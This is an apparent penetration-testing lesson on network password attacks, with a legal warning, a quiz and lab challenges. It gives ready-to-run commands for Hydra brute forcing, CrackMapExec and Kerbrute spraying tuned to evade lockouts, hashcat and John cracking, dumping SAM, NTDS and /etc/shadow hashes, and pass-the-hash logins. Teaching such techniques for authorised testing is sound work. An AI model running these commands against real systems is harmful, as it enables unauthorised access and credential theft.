Network Password Attacks

intermediate30 minWriteup

Cracking and spraying passwords across network services

Learning Objectives

  • Perform password spraying
  • Use Hydra for brute forcing
  • Crack captured hashes
  • Avoid account lockouts

Humans are terrible at creating passwords. We reuse them, make them predictable, and write them on sticky notes. This makes password attacks one of the most effective ways to gain access. From brute forcing to hash cracking, this lesson covers the techniques that exploit our password weaknesses.

The goal isn't just to break passwords - it's to do it efficiently. Trying every possible combination is technically possible but practically stupid. Smart attackers use wordlists, patterns, and password psychology.

Legal Warning

Password attacks against systems you don't own or have explicit authorization to test is illegal. This applies even if you're "just testing" or the password is weak.

Types of Password Attacks

  • Brute Force: Try every combination (slow, thorough)
  • Dictionary Attack: Use wordlist of common passwords
  • Hybrid Attack: Wordlist + rules (password → Password1!)
  • Password Spraying: One password, many users
  • Credential Stuffing: Use leaked credentials
  • Hash Cracking: Crack captured password hashes

Online Password Attacks

Online attacks hit live services. They're slower because you're waiting for network responses, but they work when you don't have hashes.

Hydra

The Swiss Army knife of network brute forcing.

bash
1606070;"># SSH brute force
2hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh:606070;">//192.168.1.10
3hydra -L users.txt -P passwords.txt ssh:606070;">//192.168.1.10
4 
5606070;"># FTP
6hydra -l admin -P passwords.txt ftp:606070;">//192.168.1.10
7 
8606070;"># HTTP Basic Auth
9hydra -l admin -P passwords.txt http-get:606070;">//192.168.1.10/protected/
10 
11606070;"># HTTP POST Form
12hydra -l admin -P passwords.txt 192.168.1.10 http-post-form 606070;">#a5d6ff;">"/login:username=^USER^&password=^PASS^:Invalid credentials"
13 
14606070;"># SMB
15hydra -l admin -P passwords.txt smb:606070;">//192.168.1.10
16 
17606070;"># MySQL
18hydra -l root -P passwords.txt mysql:606070;">//192.168.1.10
19 
20606070;"># Rate limiting
21hydra -l admin -P passwords.txt -t 4 -W 2 ssh:606070;">//192.168.1.10

CrackMapExec (CME)

Perfect for Windows/SMB environments. Can spray across entire subnets.

bash
1606070;"># SMB password spray
2crackmapexec smb 192.168.1.0/24 -u admin -p password123
3 
4606070;"># User list, single password (spraying)
5crackmapexec smb 192.168.1.10 -u users.txt -p 606070;">#a5d6ff;">'Summer2024!'
6 
7606070;"># Single user, password list
8crackmapexec smb 192.168.1.10 -u admin -p passwords.txt
9 
10606070;"># WinRM
11crackmapexec winrm 192.168.1.10 -u admin -p passwords.txt
12 
13606070;"># LDAP
14crackmapexec ldap 192.168.1.10 -u admin -p passwords.txt

Account Lockout

Most systems lock accounts after 3-5 failed attempts. Password spraying (one password across many users) avoids this. Never brute force Active Directory without understanding the lockout policy.

Password Spraying Strategy

bash
1606070;"># Step 1: Enumerate valid usernames first
2606070;"># From OSINT, LinkedIn, email patterns, SMB enumeration
3 
4606070;"># Step 2: Create targeted password list
5606070;"># CompanyName + Year
6606070;"># Season + Year
7606070;"># Common patterns
8 
9cat << 606070;">#a5d6ff;">'EOF' > spray_passwords.txt
10Summer2024!
11Winter2023!
12CompanyName123
13Welcome1
14Password1
15EOF
16 
17606070;"># Step 3: Spray with delays between attempts
18crackmapexec smb 192.168.1.10 -u users.txt -p spray_passwords.txt --continue-on-success
19 
20606070;"># Kerbrute for AD (doesn't cause lockouts with pre-auth disabled)
21kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt 606070;">#a5d6ff;">'Password123!'

Spray Smart

Research the target: What's their password policy? Any recent password resets? New hires? New hire orientation often means default passwords like "Welcome1" or "ChangeMe123".

Hash Cracking

When you have password hashes, crack them offline. No rate limiting, no lockouts - just raw computing power vs. hash strength.

Identifying Hashes

bash
1606070;"># Using hash-identifier
2hash-identifier
3 
4606070;"># Using hashid
5hashid 606070;">#a5d6ff;">'e10adc3949ba59abbe56e057f20f883e'
6 
7606070;"># Common hash formats
8MD5:        32 hex chars
9SHA1:       40 hex chars
10SHA256:     64 hex chars
11SHA512:     128 hex chars
12NTLM:       32 hex chars
13LM:         32 hex chars (often aad3b... prefix)
14bcrypt:     $2a$/$2b$/$2y$ prefix
15sha512crypt: $6$ prefix

Hashcat

GPU-accelerated hash cracking. Incredibly fast.

bash
1606070;"># Basic dictionary attack
2hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt   606070;"># MD5
3hashcat -m 1000 hash.txt rockyou.txt                       606070;"># NTLM
4hashcat -m 1800 hash.txt rockyou.txt                       606070;"># sha512crypt
5hashcat -m 3200 hash.txt rockyou.txt                       606070;"># bcrypt
6 
7606070;"># With rules
8hashcat -m 1000 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
9 
10606070;"># Brute force
11hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a    606070;"># 6-char all chars
12hashcat -m 0 hash.txt -a 3 ?u?l?l?l?d?d?d  606070;"># Ulllnnn pattern
13 
14606070;"># Character sets
15606070;"># ?l = lowercase, ?u = uppercase, ?d = digits
16606070;"># ?s = symbols, ?a = all printable
17 
18606070;"># Show cracked
19hashcat -m 1000 hash.txt --show
20 
21606070;"># Resume session
22hashcat --restore

John the Ripper

CPU-based, great format support, excellent for Unix hashes.

bash
1606070;"># Auto-detect format
2john hash.txt
3 
4606070;"># Specify format
5john --format=raw-md5 hash.txt
6john --format=nt hash.txt
7 
8606070;"># With wordlist
9john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
10 
11606070;"># With rules
12john --wordlist=rockyou.txt --rules=best64 hash.txt
13 
14606070;"># Show cracked
15john --show hash.txt
16 
17606070;"># Extract hashes from files
18unshadow /etc/passwd /etc/shadow > unshadowed.txt
19john unshadowed.txt

Wordlists & Rules

Essential Wordlists

bash
1606070;"># RockYou (14 million passwords)
2/usr/share/wordlists/rockyou.txt
3 
4606070;"># SecLists collection
5/usr/share/seclists/Passwords/
6 
7606070;"># Common-Credentials
8/usr/share/seclists/Passwords/Common-Credentials/
9 
10606070;"># Generate custom wordlist
11cewl https:606070;">//company.com -w cewl_wordlist.txt -d 2 -m 5
12 
13606070;"># Create targeted wordlist
14cupp -i  606070;"># Interactive mode for social engineering data

Rule Files

bash
1606070;"># Hashcat rules
2/usr/share/hashcat/rules/best64.rule      606070;"># Fast, high yield
3/usr/share/hashcat/rules/rockyou-30000.rule
4/usr/share/hashcat/rules/d3ad0ne.rule
5 
6606070;"># John rules
7/etc/john/john.conf (Jumbo rules section)
8 
9606070;"># Custom rule examples
10606070;"># Add numbers: $1 $2 $3 = password1, password2, password3
11606070;"># Toggle case: T0 = Password
12606070;"># Append special: $! = password!

Windows Hash Attacks

bash
1606070;"># NTLM format: username:RID:LM:NTLM:::
2606070;"># Example: admin:500:aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e:::
3 
4606070;"># Extract from SAM (requires SYSTEM and SAM files)
5secretsdump.py -sam SAM -system SYSTEM LOCAL
6 
7606070;"># Extract from NTDS.dit (domain controller)
8secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
9 
10606070;"># Crack NTLM
11hashcat -m 1000 ntlm_hashes.txt rockyou.txt
12 
13606070;"># Pass-the-Hash (no cracking needed!)
14crackmapexec smb 192.168.1.10 -u admin -H 606070;">#a5d6ff;">'aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e'
15psexec.py -hashes 606070;">#a5d6ff;">'aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e' admin@192.168.1.10

Pass-the-Hash

With NTLM hashes, you often don't need to crack them. Many Windows services accept the hash directly for authentication!

Linux Hash Attacks

bash
1606070;"># /etc/shadow format
2606070;"># username:$id$salt$hash:lastchanged:min:max:warn:inactive:expire
3 
4606070;"># Hash types by ID
5606070;"># $1$ = MD5 (old, weak)
6606070;"># $5$ = SHA-256
7606070;"># $6$ = SHA-512 (most common)
8606070;"># $y$ or $7$ = yescrypt (newer)
9 
10606070;"># Combine passwd and shadow
11unshadow /etc/passwd /etc/shadow > linux_hashes.txt
12 
13606070;"># Crack with John
14john --wordlist=rockyou.txt linux_hashes.txt
15 
16606070;"># Crack with Hashcat
17606070;"># SHA-512: -m 1800
18hashcat -m 1800 linux_hashes.txt rockyou.txt

Password Attack Methodology

Password Attack Process

1
Enumerate UsersGather valid usernames from all sources
2
Check PolicyUnderstand lockout thresholds
3
Spray FirstTry common passwords across all users
4
Targeted BruteIf spraying fails, target specific accounts
5
Hash HuntingLook for cached/stored hashes
6
Crack HashesOffline cracking with rules and wordlists
7
Credential ReuseTry cracked creds on other systems

Knowledge Check

Quick Quiz
Question 1 of 3

What is password spraying?

Challenges

Spray and Pray

Challenge
🔥 intermediate

Given a list of users and knowing the password policy requires 8+ chars with a number, spray common passwords to find valid credentials.

Need a hint? (4 available)

Crack the Hashes

Challenge
🔥 intermediate

You've obtained NTLM hashes from a domain controller. Crack as many as possible and identify any password patterns.

Need a hint? (4 available)

Key Takeaways

  • Password spraying avoids lockouts by trying few passwords across many users
  • Online attacks are slow; offline hash cracking is billions per second
  • Hydra for network services, CrackMapExec for Windows environments
  • Hashcat (GPU) is fastest, John the Ripper has best format support
  • Pass-the-Hash lets you authenticate without cracking NTLM
  • Custom wordlists based on target (CeWL, CUPP) are more effective
  • Rules transform wordlists: password → Password1!